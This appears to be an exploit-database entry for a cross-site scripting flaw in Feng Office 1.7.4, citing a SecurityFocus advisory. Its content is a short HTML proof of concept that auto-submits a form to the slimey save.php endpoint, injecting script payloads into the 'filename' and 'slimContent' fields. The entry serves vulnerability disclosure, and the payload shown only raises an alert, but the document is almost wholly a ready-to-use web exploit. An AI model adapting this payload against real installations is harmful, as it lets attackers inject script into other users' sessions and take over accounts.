EXPLOITS

Feng Office 1.7.4 - Cross-Site Scripting

Author: AutoSec Tools
type: webapps
platform: php
port: 
date_added: 2014-10-23  
date_updated: 2016-11-12  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 35042.txt  

source: https://www.securityfocus.com/bid/47049/info

<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php">
<input type="hidden" name="filename" value=""><script>alert(0)</script>" />
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" />
</form>
</body>
</html>